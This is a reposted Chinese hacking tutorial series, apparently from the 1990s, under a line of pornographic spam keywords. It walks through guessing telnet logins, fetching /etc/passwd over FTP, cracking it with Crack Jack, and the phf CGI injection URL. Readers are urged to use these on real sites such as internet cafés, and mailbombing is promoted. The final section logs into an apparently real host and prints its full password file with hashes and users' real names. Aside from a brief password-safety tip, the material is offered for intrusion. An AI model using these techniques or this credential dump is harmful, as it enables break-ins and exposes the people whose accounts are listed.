欧美性猛交XXXX免费看蜜桃,成人网18免费韩国,亚洲国产成人精品区综合,欧美日韩一区二区三区高清不卡,亚洲综合一区二区精品久久

打開(kāi)APP
userphoto
未登錄

開(kāi)通VIP,暢享免費電子書(shū)等14項超值服

開(kāi)通VIP
破解系統(1-7)
How 1.
進(jìn)入主機有好幾種方式, 可以經(jīng)由 Telnet (Port 23) 或 SendMail (Port 25)
或 FTP 或 WWW (Port 80) 的方式進(jìn)入, 一臺主機雖然只有一個(gè)位址, 但是它可能
同時(shí)進(jìn)行多項服務(wù), 所以如果你只是要 "進(jìn)入" 該主機, 這些 Port 都是很好的進(jìn)
行方向. 當然還有很多 Port, 但是 DayTime 的 Port 你能拿它作甚麼??? 我不知
道, 你知道嗎?!

底下的示范并不是像寫(xiě)出來(lái)的那麼容易, 只不過(guò)是要讓你了解如何進(jìn)入, 當然其
中還有很多問(wèn)題, 如打錯指令...... 等等的毛病... 沒(méi)有出現在課堂上, 但是我為了
面子.... 一定要刪掉這些不堪入目的東西嘛...

示范進(jìn)入主機的方法: (By CoolFire)

(首先要先連上某一臺你已經(jīng)有賬號的 Telnet 主機, 當然最好是假的, 也就是 Crack
過(guò)的主機, 然後利用它來(lái) Crack 別的主機, 才不會(huì )被別人以逆流法查出你的所在)

Digital UNIX (ms.hinet.net) (ttypa)

login: FakeName
Password:
Last login: Mon Dec 2 03:24:00 from 255.255.0.0

(我用的是 ms.hinet.net ... 當然是假的羅, 都已經(jīng)經(jīng)過(guò)修改了啦 !!
沒(méi)有這一臺主機啦 !! 別怕 ! 別怕 ! 以下的主機名稱(chēng)都是假的名
稱(chēng), 請同學(xué)們要記得 !!)

Digital UNIX V1.2C (Rev. 248); Mon Oct 31 21:23:02 CST 1996
Digital UNIX V1.2C Worksystem Software (Rev. 248)
Digital UNIX Chinese Support V1.2C (rev. 3)

(嗯... 進(jìn)來(lái)了 ! 開(kāi)始攻擊吧 ! 本次的目標是......)

ms.hinet.net> telnet www.fuckyou.hinet.net (Telnet 試試看....)
Trying 111.222.255.255...
Connected to cool.fuckyou.hinet.net.
Escape character is ‘^]‘.
Password:
Login incorrect
(沒(méi)關(guān)系, 再來(lái) !!)
cool login: hinet
Password:
Login incorrect

cool login:

(都沒(méi)猜對, 這邊用的是 猜 的方法, 今天運氣好像不好)
telnet> close
Connection closed.

(重來(lái), 換個(gè) Port 試試看 !!)

ms.hinet.net> telnet 111.222.255.255 80
Trying 111.222.255.255...
Connected to 111.222.255.255.
Escape character is ‘^]‘.


<HTML>
<HEAD>
<TITLE>Error</TITLE>
</HEAD>
<BODY>
<H1>Error 400</H1>

Invalid request "" (unknown method)

<P><HR><ADDRESS><A >CERN-HTTPD 3.0A</A></ADDRESS>
</BODY>
</HTML>
Connection closed by foreign host.

(哇哩 !! 連密碼都沒(méi)得輸入, 真是..... 再來(lái) !! 要有恒心 !!)
(換 FTP Port 試試)

ms.hinet.net> ftp 111.222.255.255
Connected to 111.222.255.255.
220 cool FTP server (Version wu-2.4(1) Tue Aug 8 15:50:43 CDT 1995) ready.
Name (111.222.255.255:FakeName): anonymous
331 Guest login ok, send your complete e-mail address as password.
Password:
230-Welcome, archive user! This is an experimental FTP server. If have any
230-unusual problems, please report them via e-mail to root@cool.com
230-If you do have problems, please try using a dash (-) as the first character
230-of your password -- this will turn off the continuation messages that may
230-be confusing your ftp client.
230-
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.

(哇 ! 可以用 anonymous 進(jìn)來(lái)耶!! password 部份輸入 aaa@ 就好了 !
不要留下足跡喔!!)

ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection for file list.
etc
pub
usr
bin
lib
incoming
welcome.msg
226 Transfer complete.

(嗯嗯... 太好了 ! 進(jìn)來(lái)了 !! 下一個(gè)目標是.....)

ftp> cd etc
250 CWD command successful.
ftp> get passwd (抓回來(lái) !!)
200 PORT command successful.
150 Opening BINARY mode data connection for passwd (566 bytes).
226 Transfer complete.
566 bytes received in 0.56 seconds (0.93 Kbytes/s)
(喔... 這麼容易嗎??)
ftp> !cat passwd (看看 !!!)
root::0:0:root:/root:/bin/bash
bin:*:1:1:bin:/bin:
daemon:*:2:2:daemon:/sbin:
adm:*:3:4:adm:/var/adm:
lp:*:4:7:lp:/var/spool/lpd:
sync:*:5:0:sync:/sbin:/bin/sync
shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown
halt:*:7:0:halt:/sbin:/sbin/halt
mail:*:8:12:mail:/var/spool/mail:
news:*:9:13:news:/var/spool/news:
uucp:*:10:14:uucp:/var/spool/uucp:
operator:*:11:0:operator:/root:/bin/bash
games:*:12:100:games:/usr/games:
man:*:13:15:man:/usr/man:
postmaster:*:14:12:postmaster:/var/spool/mail:/bin/bash
ftp:*:404:1::/home/ftp:/bin/bash

(哇哩... 是 Shadow 的... 真是出師不利.... )

ftp> bye
221 Goodbye.

(不信邪.... 還是老話(huà), 要有恒心....)
(FTP 不行, 再 Telnet 看看 !!)

ms.hinet.net> telnet www.fuckyou.hinet.net
Trying 111.222.255.255...
Connected to cool.fuckyou.hinet.net.
Escape character is ‘^]‘.
Password:
Login incorrect

(又猜錯 !!)

cool login: fuckyou
Password:
Last login: Mon Dec 2 09:20:07 from 205.11.122.12
Linux 1.2.13.

Some programming languages manage to absorb change but withstand
progress.

cool:~$

(哇哈哈 !! 哪個(gè)笨 root, 用 system name 作 username 連
password 也是 system name.... 總算... 沒(méi)白玩...)

cool:~$ system
bash: system: command not found

(嗯... 這個(gè) user 的權限好像不大....)

cool:~$ ls
cool:~$ pwd
/home/fuckyou
cool:~$ cd /
cool:/$ ls
Public/ cdrom/ lib/ mnt/ tmp/ www/
README dev/ linux* proc/ usr/
bin/ etc/ local/ root/ var/
boot/ home/ lost+found/ sbin/
cool:/$ cd etc
telnet> quit
(好想睡呀 !! 不玩了 !! 下節課再開(kāi)始....)
Connection closed.
ms.hinet.net> exit

(走了 !! 下節課在見(jiàn)啦 !! 今天就上到這里 ! 老師要先下班了 !!)
(有學(xué)生說(shuō): 騙人! 還沒(méi)有破解呀!! 胡說(shuō) ! 不是已經(jīng)進(jìn)來(lái)了嗎 ???
看看這節課上的是甚麼??? ---->進(jìn)入主機 !! 嗯.....)

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
How 2.

上節課抓回來(lái)一個(gè) "亂七八糟" 的 /etc/passwd, 你以為我的真那麼笨嗎?? guest 所
抓回來(lái)的能是甚麼好東西?? 所以這一節課繼續上次的攻擊行動(dòng). 上節課我們已
經(jīng) "猜" 到了一個(gè)不是 guest 的 username 及 password. 今天就以它來(lái)進(jìn)入主機瞧瞧
!!

Digital UNIX (ms.hinet.net) (ttypa)

login: FakeName
Password:
Last login: Mon Dec 2 03:24:00 from 255.255.0.0

Digital UNIX V1.2C (Rev. 248); Mon Oct 31 21:23:02 CST 1996
Digital UNIX V1.2C Worksystem Software (Rev. 248)
Digital UNIX Chinese Support V1.2C (rev. 3)

(嗯... 進(jìn)來(lái)了 ! 開(kāi)始攻擊吧 ! 本次的目標是.....呵...)

ms.hinet.net> telnet cool.fuckyou.hinet.net (Telnet 試試看.... 昨天的位址,
有作筆記吧!)
stsvr.showtower.com.tw> telnet cool.fuckyou.hinet.net
Trying 111.222.255.255...
Connected to cool.fuckyou.hinet.net.
Escape character is ‘^]‘.
Password:
Login incorrect

cool login: fuckyou
Password: (一樣輸入 fuckyou)
Last login: Mon Dec 1 12:44:10 from ms.hinet.net
Linux 1.2.13.

cool:~$ cd /etc
cool:/etc$ ls
DIR_COLORS ftpusers localtime resolv.conf
HOSTNAME gateways magic rpc
NETWORKING group mail.rc securetty
NNTP_INEWS_DOMAIN host.conf motd sendmail.cf
X11@ hosts messages/ sendmail.st
XF86Config hosts.allow mtab services
at.deny hosts.deny mtools shells
bootptab hosts.equiv named.boot shutdownp
csh.cshrc hosts.lpd networks snoopy/
csh.login httpd.conf nntpserver slip.hosts
exports inetd.conf passwd snooptab
fastboot inittab passwd.OLD syslog.conf
fdprm issue passwd.old syslog.pid
fstab ld.so.cache printcap ttys
ftpaccess ld.so.conf profile utmp@

(找尋目標..... 太亂了 ! 懶得找, 再來(lái) ....)
cool:/etc$ ls pa*
passwd passwd.OLD passwd.old

(果然在)

cool:/etc$ more passwd
(看看有沒(méi)有 Shadow...)

root:acqQkJ2LoYp:0:0:root:/root:/bin/bash
john:234ab56:9999:13:John Smith:/home/john:/bin/john

(正點(diǎn) ! 一點(diǎn)都沒(méi)有防備 !!)
cool:/etc$ exit
logout
(走了!.... 換 FTP 上場(chǎng) !!)
Connection closed by foreign host.
ms.hinet.net> ftp www.fuckyou.hinet.net
Connected to cool.fuckyou.hinet.net.
220 cool FTP server (Version wu-2.4(1) Tue Aug 8 15:50:43 CDT 1995) ready.
Name (www.fuckyou.hinet.net:66126): fuckyou
331 Password required for fuckyou.
Password:
230 User fuckyou logged in.
Remote system type is UNIX.
Using binary mode to transfer files.

ftp> cd /etc
250 CWD command successful.
ftp> get passwd
200 PORT command successful.
150 Opening BINARY mode data connection for passwd (350 bytes).
226 Transfer complete.
350 bytes received in 0.68 seconds (1.9 Kbytes/s)

ftp> !cat passwd
root:acqQkJ2LoYp:0:0:root:/root:/bin/bash
john:234ab56:9999:13:John Smith:/home/john:/bin/john

(看看 ! 呵 ! 假不了 !!......)
ftp> bye
221 Goodbye.
ms.hinet.net> exit

(閃人羅 !! 下課 !!.... 喔慢點(diǎn), 還有事要說(shuō)明......)

passwd 的 Shadow 就是把 passwd 放在 shadow 檔中, 而你原先在第一節課
所看到的這個(gè)格式的 passwd 并不是真正的 passwd....

root::0:0:root:/root:/bin/bash

因為密碼的部份沒(méi)有東西.... 所以拿了也沒(méi)有用 !! 但這一節課所拿到的東西呢,
像是這樣, 有幾點(diǎn)需要說(shuō)明的, 就是它究竟代表著(zhù)甚麼???

john:234ab56:9999:13:John Smith:/home/john:/bin/sh

它以 ":" 分成幾個(gè)欄位, 各欄位對照如下:
User Name: john
Password:234ab56
User No: 9999
Group No: 13
Real Name: John Smith
Home Dir: /home/john
Shell: /bin/sh

了了吧 ! 了了吧 ! 保留著(zhù)你千辛萬(wàn)苦所拿到的 passwd, 咱們第三節
課再來(lái)告訴各位如何使用 Crack Jack 把 passwd 解碼.... 呵呵...
zzZZzZzz...

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-


Crack Jack V1.4 中文使用說(shuō)明 (By CoolFire 12-1-1996)

嗯... 該到第三課了 !! 累了的同學(xué)先去喝口水吧!

這一節課咱們來(lái)說(shuō)說(shuō) Crack Jack ! 這可是個(gè)解讀 /etc/passwd 的好工具喔,
不要告訴我你習慣用
Brute, 拿 Brute 跟 Crack Jack 的速度比比看, 包準你馬上投向 Crack Jack 1.4
的懷抱, 但請
先確定你所使用的是 Crack Jack 1.4, 你可以在 CoolFire 的 Hacker&Mailer Page
中拿到這個(gè)版
本的 Crack Jack ! 這才是真正有用的版本, 速度... 對... 就是這點(diǎn)別人都比不上 !
但還是要講
講它的缺點(diǎn)... 就是只能在 DOS 跟 OS2 中跑, 如果在 Windoz 95 上開(kāi)個(gè) DOS Mode 跑,
它可是連
理都不會(huì )理你的 !

OK! 現在切入正題 ! etc/passwd 拿到手了吧 !! 開(kāi)始羅 !! 使用 Crack Jack 1.4
前所需要的東
西有這些 [1] Crack Jack 1.4 (廢話(huà)...$%^&@@) [2] /etc/passwd 檔案, 你可以在 Unix
系統中
的 /etc/ 目錄中找到 passwd [3] 字典檔 (哪里找, 自己敲... 呵 ClayMore 中有一份
DIC.TXT
是有一千多個(gè)字的字典, 但比起我的字典可就小巫見(jiàn)大巫了, LetMeIn! 1.0 里面也有, 聽(tīng)
James
說(shuō) 2.0 Release 的時(shí)候會(huì )有更棒的字典檔含入, 期待吧!).... 使用 Crack Jack 1.4
前需先確
定你所使用的機器是 386 含以上 CPU 的 ! 然後最好有充足的記憶體 !!

開(kāi)始 Jack 時(shí)只要敲入 JACK 即可, 它會(huì )問(wèn)你 PW Name... 輸入你的 passwd 檔名,
Dictionary
Name 輸入你的字典檔名, Jack 就會(huì )開(kāi)始找了 ! 找到時(shí)會(huì )告訴你, 也會(huì )在 JACK.POT
中寫(xiě)入它所
找到的密碼 !! 但... 有點(diǎn)怪的格式! 如果找到的是具 root 權限的密碼, Jack 會(huì )告訴你
This is
JackAss... 嗯...說(shuō)臟話(huà)了 !! 因為使用 Jack 占用的時(shí)間實(shí)在太多,
如果你中途想要停掉時(shí)只要
按下 Ctrl-C 即可, 別以為你前功盡棄了! 因為 Jack 有個(gè) Restore 的功能,
中斷時(shí)會(huì )自動(dòng)存檔
為 RESTORE, 下次要繼續這次的尋找只要輸入 Jack -Restore:RESTORE 即可 !!
當然你也可以為
你的 Restore 重新命名 ! Jack 也會(huì )找得到的 ... 如 Ren restore restore.HNT
之後要再尋找
的時(shí)後就 Jack -Restore:RESTORE.HNT 即可... Jack 會(huì )很自動(dòng)的 Restore
前次所尋找的字串...
繼續幫你找下去....

字典檔哪里找: 我的不給你! 可以找別的 Brute Force 之類(lèi)的程式, 有些里面會(huì )附,
或是找找其它
的 Hacker 地下站看看有沒(méi)有, 自己編一個(gè), 或找個(gè)英漢字典軟體將字典的部份解出來(lái),
可能要有
一點(diǎn)資料欄位及寫(xiě)程式的基礎.

[這一節課沒(méi)有范例] 成功的案例: 找到過(guò)某家網(wǎng)路咖啡店的 root 權限密碼 ! Jack
好正點(diǎn)呀 !!!
所花的時(shí)間: 20 分鐘左右... 但也有找了一兩天也找不到的..... 嗚... 駭客們! 加油吧
!!

詳細內容: **談一下 Crack Jack 猜猜密碼

許多人從上一次介紹 Crack Jack 之後就應該已經(jīng)領(lǐng)教過(guò)它的功力了,但是有幾點(diǎn)需要說(shuō)明的,有些人使用 Jack 來(lái)幫你尋找 password, 我就當你已經(jīng)抓到了沒(méi)有 shadow 的/etc/passwd, 但是為甚麼使用 Jack 還是找不到呢?? 我想你應該要換個(gè)正點(diǎn)一點(diǎn)的字典檔了, 因為Jack 還是根據你所提供的字典檔在尋找, 如果你提供的字典本身就沒(méi)有這些字,那當然連一個(gè)小小賬號的密碼你都別想猜到了. 數一下你所使用的字典檔中有多少字 ???我用的字典檔有十九萬(wàn)多個(gè)字, 你的呢? 是不是小巫見(jiàn)大巫呀 ?? 那麼就趕快充實(shí)一下字典檔再重新尋找吧 !!

許多人的密碼都有一定的法則, 我自己寫(xiě)了 PaSs2DiC 就是將 UserName 由
passwd檔轉成字典檔的工具, 這是對一些喜歡使用 UserName 當作 Password 的人最好的方式,但是也曾經(jīng)好運的找到別人的密碼, 真不曉得"甲"是不是暗戀"乙"才用"乙"的 ID 作為密碼的 ???你可以很簡(jiǎn)單的使用Qbasic 來(lái)制作 "序數" 密碼, 或日期密碼, 底下簡(jiǎn)單的作一個(gè) 0101 (一月一日) 到1231 的密碼檔出來(lái):
------------Cut Here MakeDate.BAS -------------------
Open "Dates" for output as #1
for I=1 to 12
for J=1 to 31
I1$=rtrim$(ltrim$str$(I)))
J1$=rtrim$(ltrim$str$(J)))
if len(I1$)=1 then I1$="0"+I1$
if len(J1$)=1 then J1$="0"+J1$
Out$=I1$+J1$
print #1,Out$
next I
next J
close
------------ Cut Here End MakeDate.BAS ----------------
這個(gè)小程式將會(huì )寫(xiě)一個(gè) "DATES" 的檔案, 里面就是你要的字典, 當然啦,這只是包含月跟日 !!
如果你要猜的密碼是含年份的,你可能要再增加一些程式碼, 再 Run 一次試試看了,不過(guò)這是一個(gè)好的開(kāi)始不是嗎 ??

**如何保護自己的密碼

談了這麼多的密碼猜法, 當然要談一下如何保護自己的密碼不被破解,
請遵守以下的原則:

[1]不用生日作為密碼(太容易猜了啦)

[2]不用序數作為密碼(除非你的序數無(wú)限大)
[3]不用身份證字號作為密碼(LetMeIn! 里有猜身份證字號的功能耶)
[4]不用在字典中查得到的字作為密碼.

那麼依照上面的幾點(diǎn)說(shuō)法, 甚麼樣子的密碼最不容易猜, 自己也最好記呢?? 答案是:用一句有意義的話(huà)來(lái)作為自己的密碼, 例如: NoOneCanCrackIt 就是一個(gè)很難猜的密碼類(lèi)型,基於這個(gè)密碼猜法的原則, 你的密碼是不是要作些更新, 或是大小寫(xiě)要作一些對調 ?? 如果你的密碼是coolfire,建議你最好能改成 CoolFire 或 coolfires (加復數 "s"),這樣被猜中的機率就小了很多. 如果你是一個(gè) Hacker, 你的密碼也被人猜中的話(huà)... 那...#%%^^^&@

**正式的話(huà)題

這次的話(huà)題當然還是 Crack, 相信許多人已經(jīng)看過(guò) CoolHC#1 了,當然眼尖的人可能也已經(jīng) D/LSystem Holes 試過(guò)了, 你有成功的例子嗎 ?? 如果沒(méi)有, 這份 CoolHC#2
可能就是你的強心針,因為這次談的正是 System Holes #1 成功的案例.

Step 1. 連線(xiàn)到 "蕃薯藤" 找 "網(wǎng)路咖啡" 找到好多家網(wǎng)路咖啡的 WWW 網(wǎng)址,
一一連上去試試看
在 System Holes #1 中的方法可不可行.
Step 2. 若可行則會(huì )傳回 /etc/passwd 資訊, 存檔後迅速 Logout, 使用 Crack Jack
解讀!!

[[實(shí)例探討]]

System Holes #1 中所介紹的 WWW 入侵法是這樣子的:
http://www.somewhere.com/cgi-bin/nph-test-cgi?* 後再
http://www.somewhere.com/cgi-bin/phf?Qalias=x%0aless%/20/etc/passwd

[1] 用 WWW Browser 連到 yournet.net
[2] Location 輸入 --> "www.yournet.net/cgi-bin/nph-test-cgi?*"
[3] 接著(zhù)如果出來(lái)一份像 Report 的畫(huà)面的話(huà), 接著(zhù)輸入
/cgi-bin/phf?Qalias=x%0aless%20/etc/passwd
[4] 發(fā)生了甚麼事?? etc/passwd 在你的瀏覽器中 "顯示" 出來(lái)了 !! 快點(diǎn) Save 吧
!!

這個(gè)方法所用的是系統 "檢索" 的漏洞, 不提供這個(gè)功能,
或是伺服器檢索類(lèi)型不同的機器則不
會(huì )接受這樣的指令, 當然也就逃過(guò)我們這次的模擬演練啦 !! 但是.... 相信我,
你一定會(huì )找到一
家脫線(xiàn)的網(wǎng)路咖啡, 并沒(méi)有像我們一樣每天閱讀 Mail List 的信,
對系統安全一點(diǎn)研究也沒(méi)有的
人不在少數. http://hacker.welcome.com 就是這樣的一個(gè) Net Coffee Shop...
呵.... 快來(lái)試
試吧 !!

當 CoolFire 抓到 /etc/passwd 後, 立刻存檔, 也馬上斷線(xiàn), 并且拿出 UltraEdit
來(lái)瞧一下使用
者的資訊, 當然這個(gè)小 passwd 對 Crack Jack 來(lái)說(shuō), 實(shí)在是不夠看,
沒(méi)幾分鐘就在我的 486 機
器上顯示出來(lái)幾個(gè)以 UserName 作為 Password 的資訊 (歸功於 PaSs2DiC 及
CrackJack 的功勞)
不過(guò)當我試著(zhù)找尋 root 的密碼時(shí), 一想到我那將近 20 萬(wàn)字的字典檔,
就想到可能花費的時(shí)間一
定相當的驚人, 於是就以 Jack 的 Option 設定只尋找 root 那一行, ...
(過(guò)了良久)... 果不然
又是一個(gè)笨 root. 用了 "非常" 容易猜的密碼... <--- This is JackAss... 呵!! Got
It!

如果你所使用的機器速度不是頂快, 你最好能夠到快一點(diǎn)的機器上使用 Crack Jack,
不然你也可
以將字典檔切割成幾個(gè)小檔案, 然後再分別在幾臺機器上跑, 我目前使用的配備是
486DX4-130
32MB RAM, 3.2GB HDD, 近 20 萬(wàn)字的字典檔, 如果在分析較大的 passwd
檔時(shí)我會(huì )將字典檔切割
為四至五個(gè)小檔 (看有多少臺機器可跑),
然後在周末下班前在公司的幾臺機器上分別執行 Crack
Jack, 等到禮拜一上班時(shí)就等著(zhù)接收成果了! 當然如果你只有一臺機器, passwd
檔又很大的話(huà),
由於 Crack Jack 無(wú)法於 Windoz 95 下使用, 你可能只能犧升時(shí)間或機器來(lái)跑了!
再沒(méi)有辦法的
話(huà), 亦可使用單機多工, 多開(kāi)幾個(gè) DOS Box 來(lái)跑 Brute, 也許也是一個(gè)可行的辦法!

**後語(yǔ)

有許多人在使用 Crack Jack 的時(shí)候有許多問(wèn)題, 不過(guò)看了 CoolHC#1 應該都解決了吧
最近大
家問(wèn)的比較多的是 UpYours 3.0, 雖然已經(jīng)改進(jìn)了 Install 的問(wèn)題,
不過(guò)大家的問(wèn)題還是都出在
Winsck.ocx 上面, 有人說(shuō)裝了 MSICP Beta 會(huì )好 ?? 但也有實(shí)例裝了也還不能 Run 的,
在此建議
大家不要再玩 MailBomb 了, 雖然我喜歡收集這種東西, 但還是少亂炸為妙,
已經(jīng)證實(shí)有許多常用
的 MailBomb 沒(méi)有辦法 Fake IP 了 !! 所以... 如果 UpYours 3.0
裝不起來(lái)的人就試試 KaBoom!
V3.0 吧 ! 雖然沒(méi)有辦法 Fake IP (選錯 Mail Server 的話(huà)), 但是也是一個(gè)不錯的
AnonyMailer
如果要發(fā)匿名信, 現在首頁(yè)上有可以幫你發(fā)信的 Mailer, 會(huì )安全一點(diǎn).

如果你仍舊對 UpYours 3.0 不死心, 就試試 ResSvr32.exe (Under Windows/system
directory),
看看能不能將 WinSck.ocx 裝上了... 記得先 UnReg 再 Reg...

在此建議大家可以多訂閱一些 "系統安全" 討論的 Mail List或多參考一些已經(jīng)被找出來(lái)的系統漏洞, 因為有些人對這些方面并不是很重視, 所以這些資訊也就顯得格外的重要了,
如果能夠多參考一些資訊, 在你入侵的時(shí)候會(huì )有很大的幫助, 當然, 如果你能作出一份列表出來(lái),放在手邊參考的話(huà), 就可以快速的; 安全的入侵了!! 下一次所談的是 SendMail 的 Bug 實(shí)例,在這中間當然照往例會(huì )先出一份 System Holes #2 來(lái)作為資料. 如果有興趣的人在 SH#2出來(lái)的時(shí)候可以先研究看看. 下次見(jiàn)! Merry X‘Mas..... & Happy New Year.......
詳細內容: ISP 是一般 User 撥接的源頭, 技術(shù)上理應比較強, 但還是輕易讓人入侵, 且又沒(méi)有教導User 正確的網(wǎng)路使用觀(guān)念 (Password 的設定及 proxy 的使用等),實(shí)在不敢想像這樣的網(wǎng)路發(fā)展到幾年後會(huì )是甚麼樣子 ??

這一次的說(shuō)明還是沒(méi)有談到新的技巧, 在 James將首頁(yè)更新後各位應該已經(jīng)可以從中學(xué)到許多東西了, 如果想要學(xué)習入侵, 就一定要知道最新的資訊 (入侵本國的網(wǎng)路則不用,
反正沒(méi)人重視網(wǎng)路安全..... 真失望), 在別人還沒(méi)將 Bug 修正之前就搶先一步拿到 /etc/passwd,所以訂閱一些網(wǎng)路安全的 Mail List 是必要的, 多看一些網(wǎng)安有關(guān)的 News Group 也是必要的 (不僅 Hacker如此, ISP 更要多注意這些資訊!). 日後有空再整里一些 Mail List 給大家 !!

本次主題: 說(shuō)明如何連接該 ISP 并且對其 /etc/passwd 解碼
連接位址: www.coffee.com.tw (203.66.169.11)
特別說(shuō)明: 由於本次主題說(shuō)明重點(diǎn)使用真實(shí)的位址及名稱(chēng), 所以 CoolFire 已經(jīng) Mail
給該網(wǎng)頁(yè)之維
護人員更改密碼, 但該網(wǎng)頁(yè)之 ISP 仍為新手之練習好題材! CoolFire
Mail 給該網(wǎng)頁(yè)維護
人員之信件內容如下, 如果他還不盡快改掉, 我也沒(méi)辦法了!

Mail sent to dhacme@tp.globalnet.com.tw:
Subject: 請速更動(dòng)網(wǎng)頁(yè)密碼
From: CoolFire <coolfires@hotmail.com>

你的網(wǎng)頁(yè)作得不錯, 但是因為你所設定的密碼太容易為駭客所
入侵, 請於見(jiàn)到此信後速速更改你的網(wǎng)頁(yè)進(jìn)入密碼, 否則下次
若網(wǎng)頁(yè)遭到篡改, 本人概不負責!!

**** 課程開(kāi)始 ****

請注意: 由於本次所作的課程內容以實(shí)作為主, 除了本人 IP 有所更改,
一切都使用本人所用之
Telnet 軟體 Log 檔收錄, 故若道德感不佳者請勿閱讀以下之詳細破解內容,
否則本人概不負責!

(連線(xiàn)到某一主機之後.... 此處的 ms.hinet.net.tw 是假的 Domain name)
ms.hinet.net.tw> telnet www.coffee.com.tw
Trying 203.66.169.11...
Connected to www.coffee.com.tw.
Escape character is ‘^]‘.
Password: (隨便按一下 Enter)
Login incorrect

www login: coffee (以 Hacker 的敏銳判斷 username=coffee password=coffee)
Password:
Last login: Thu Jan 9 10:41:52 from ms.hinet.net.tw

歡 迎 光 臨 ....... 以下略! 因涉及該 ISP 的名譽(yù), 大家自己去看吧!
=================================================================

(直接進(jìn)入核心部份)
www:~$ cd /etc
www:/etc$ ls
DIR_COLORS hosts.equiv printcap
HOSTNAME hosts.lpd profile
NETWORKING inet@ protocols
NNTP_INEWS_DOMAIN inetd.conf psdevtab
X11@ inittab rc.d/
at.deny inittab.gettyps.sample resolv.conf
bootptab ioctl.save rpc
csh.cshrc issue securetty
csh.login issue.net securetty.old
default/ klogd.pid sendmail.cf
diphosts ld.so.cache sendmail.st
exports ld.so.conf services
fastboot lilo/ shells
fdprm lilo.conf shutdownpid
fs/ localtime skel/
fstab magic slip.hosts
ftp.banner mail.rc slip.login
ftp.deny motd snooptab
ftpaccess motd.bak sudoers
ftpconversions msgs/ syslog.conf
ftpgroups mtab syslog.pid
ftpusers mtools termcap
gateways named.boot ttys
gettydefs networks utmp@
group nntpserver vga/
host.conf passwd wtmp@
hosts passwd.OLD yp.conf.example
hosts.allow passwd.old
hosts.deny ppp/

(看看我們的目標長(cháng)得如何???)
www:/etc$ cat passwd
root:abcdefghijklmn:0:0:root:/root:/bin/bash
bin:*:1:1:bin:/bin:
daemon:*:2:2:daemon:/sbin:
adm:*:3:4:adm:/var/adm:
lp:*:4:7:lp:/var/spool/lpd:
sync:*:5:0:sync:/sbin:/bin/sync
shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown
halt:*:7:0:halt:/sbin:/sbin/halt
mail:*:8:12:mail:/var/spool/mail:
news:*:9:13:news:/usr/lib/news:
uucp:*:10:14:uucp:/var/spool/uucppublic:
operator:*:11:0:operator:/root:/bin/bash
games:*:12:100:games:/usr/games:
man:*:13:15:man:/usr/man:
postmaster:*:14:12:postmaster:/var/spool/mail:/bin/bash
nobody:*:-1:100:nobody:/dev/null:
ftp:*:404:1::/home/ftp:/bin/bash
guest:*:405:100:guest:/dev/null:/dev/null
shan:Ca3LGA8gqDV4A:501:20:Shan Huang:/home/staff/shan:/bin/bash
www:/U5N5/l0B.jWo:502:20:WWW Manager:/home/staff/www:/bin/bash
test:aFoIbr40sdbiSw:503:100:test:/home/test:/bin/bash
fax:aHhi5ZoJwWOGtc:504:100:FAX_SERVICE:/home/staff/fax:/bin/bash
women:IiO94G5YrrFfU:505:100:Perfect Women:/home/w3/women:/bin/bash
kanglin:aMjy/8maF4ZPHA:506:100:Kanglin:/home/w3/kanglin:/bin/bash
coffee:AlwDa18Au9IPg:507:100:Coffee:/home/w3/coffee:/bin/bash
bakery:aFm7GUGCuyfP2w:508:100:Bakery:/home/w3/bakery:/bin/bash
carven:aPaqr3QAdw8zbk:509:100:Carven:/home/w3/carven:/bin/bash
haurey:/2m87VjXC742s:510:100:Haurey:/home/w3/haurey:/bin/bash
prime:nPOlsQhQFJ.aM:511:100:Prime:/home/w3/prime:/bin/bash
tham:H2AOlPozwIIuo:512:100:xxxxxxxxxx:/home/w3/tham:/bin/bash
ccc:aFiKAE2saiJCMo:513:100:ccc:/home/w3/ccc:/bin/bash
sk:UPrcTmnVSkd3w:514:100:sk:/home/sk:/bin/bash
services:9yBqHWfnnNr.k:515:100:xxxx:/home/w3/haurey/services:/bin/bash
order:LpnMHVjy9M/YU:516:100:xxxx:/home/w3/haurey/order:/bin/bash
corey:mhRsFO60hFsMU:517:100:xxxx:/home/w3/haurey/corey:/bin/bash
richard:EmUWnU6Bj7hQI:519:100:richard:/home/w3/richard:/bin/bash
lilian:Opx5xwctJTO1A:520:100:lilian:/home/w3/lilian:/bin/bash
support:JdOqvTZqdZ9wQ:521:100:support:/home/w3/support:/bin/bash
hotline:BiSzCJsDhVl7c:522:100:hotline:/home/w3/hotline:/bin/bash
stonny:/UNPsb9La4nwI:523:20::/home/staff/stonny:/bin/csh
bear:w/eF/cZ32oMho:524:100:bear:/home/w3/bear:/bin/bash
lance:Pf7USG6iwgBEI:525:20:Chien-chia Lan:/home/staff/lance:/bin/tcsh
taiwankk:ijPWXFmRF79RY:526:100:hotline:/home/w3/taiwankk:/bin/bash
service:ulfWaOzIHC.M.:527:100:prime service:/home/w3/service:/bin/bash
liheng:6hGixt6Kgezmo:528:100:prime liheng:/home/w3/liheng:/bin/bash
caves:RyvviMcWTTRnc:529:100:gallery:/home/w3/caves:/bin/bash
sales:CmtV4FZsBIPvQ:518:100:prime:/home/w3/prime/sales:/bin/bash
kingtel:8E7f0PIQWfCmQ:530:100:kingtel:/home/w3/kingtel:/bin/bash
recycle1:JgbZHVRE4Jf3U:531:100:recycle1:/home/w3/recycle1:/bin/bash
recycle2:Qg85xgdnsqJYM:532:100:recycle2:/home/w3/recycle2:/bin/bash
recycle3:XhyoUBFQspiS2:533:100:recycle3:/home/w3/recycle3:/bin/bash
recycle:109mNZYIZtNEM:534:100:recycle:/home/w3/recycle:/bin/bash
hxnet:KhB./jHw.XNUI:536:100:hxnet:/home/w3/hxnet:/bin/bash
goodbook:MlD0tx.urQMYc:535:100:goodbook:/home/w3/goodbook:/bin/bash
sales1:JmKzPOBMIIYUI:537:100:sales1:/home/w3/prime/sales1:/bin/bash
rwu:Pai8mYCRQwvcs:539:100:rwu:/home/w3/kingtel/rwu:/bin/bash
charliex:Of6HaxdxkDBDw:540:100:charliex:/home/w3/kingtel/charliex:/bin/bash
